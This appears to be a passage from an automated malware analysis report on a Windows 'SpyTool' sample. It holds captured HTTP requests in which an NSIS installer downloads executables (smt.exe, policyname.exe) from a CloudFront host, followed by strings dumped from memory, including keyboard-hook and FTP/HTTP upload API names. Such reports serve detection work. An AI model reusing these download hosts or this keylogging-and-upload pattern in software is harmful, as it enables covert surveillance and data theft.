P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 20:59:00 GMT
Set-Cookie: _c4aid=F47F5BE0A6D640F38FCF6DA2C84845B5; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=F47F5BE0A6D640F38FCF6DA2C84845B5,1443214749.79177; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /smt.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d10huri5h4o4a3.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 211114
Connection: keep-alive
Date: Fri, 14 Aug 2015 19:47:15 GMT
Last-Modified: Wed, 25 Feb 2015 18:08:27 GMT
ETag: "20f288aa7d995a4bfcb240b66383ebf4"
Accept-Ranges: bytes
Server: AmazonS3
Age: 50853
X-Cache: Hit from cloudfront
Via: 1.1 a436b6df4b0d1bd189edf722b5d2a523.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 1pUN6pxltkqUUrxxYlD9n-AUrykekAFJFJyIGEzYXit12UU-XkDQRA==
GET /policyname.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d10huri5h4o4a3.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 81086
Connection: keep-alive
Date: Fri, 25 Sep 2015 20:15:12 GMT
Last-Modified: Fri, 25 Sep 2015 20:08:45 GMT
ETag: "37c03079fb3d206e4112f9aa52c41524"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2649
X-Cache: Hit from cloudfront
Via: 1.1 a436b6df4b0d1bd189edf722b5d2a523.cloudfront.net (CloudFront)
X-Amz-Cf-Id: KWkPApmJG8gWHy7_S65EdZGhf-QXiysjAjPfEn-uWxprYhSqMmohog==
Map
The SpyTool connects to the servers at the following location(s):
Strings from Dumps
upgmsd_re_005010096.exe_1928:
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
CNotSupportedException
CCmdTarget
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CFtpFileFind
CHttpConnection
CFtpConnection
CHttpFile
RegDeleteKeyExW
TaskDialogIndirect
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
CHotKeyCtrl
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
operator
portuguese-brazilian
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
%%X
RegSetKeySecurity error! (rc=%lu)
Key not found.
Error opening key.
ntdll.dll
LookupPrivilegeValue error: %u
Error %d: Could not begin update of %s
Error %d: Updating resource
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
IPHLPAPI.DLL
PSAPI.DLL
GetProcessHeap
GetWindowsDirectoryW
GetCPInfo
KERNEL32.dll
GetKeyState
SetWindowsHookExW
CreateDialogIndirectParamW
UnhookWindowsHookEx
MsgWaitForMultipleObjectsEx
GetAsyncKeyState
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardState
GetKeyNameTextW
MapVirtualKeyExW
EnumChildWindows
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GDI32.dll
MSIMG32.dll
COMDLG32.dll
WINSPOOL.DRV
RegLoadKeyW
RegUnLoadKeyW
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegSetKeySecurity
RegDeleteKeyW
RegEnumKeyExW
RegQueryInfoKeyW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
COMCTL32.dll
UrlUnescapeW
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
OLEACC.dll
InternetCrackUrlW
HttpOpenRequestW
HttpSendRequestW
HttpQueryInfoW
InternetCanonicalizeUrlW
FtpDeleteFileW
FtpRenameFileW
FtpCreateDirectoryW
FtpRemoveDirectoryW
FtpSetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpPutFileW
FtpGetFileW
HttpAddRequestHeadersW
HttpEndRequestW
HttpSendRequestExW
FtpOpenFileW
FtpCommandW
FtpFindFirstFileW
InternetOpenUrlW
WININET.dll
GdiplusShutdown
gdiplus.dll
IMM32.dll
WINMM.dll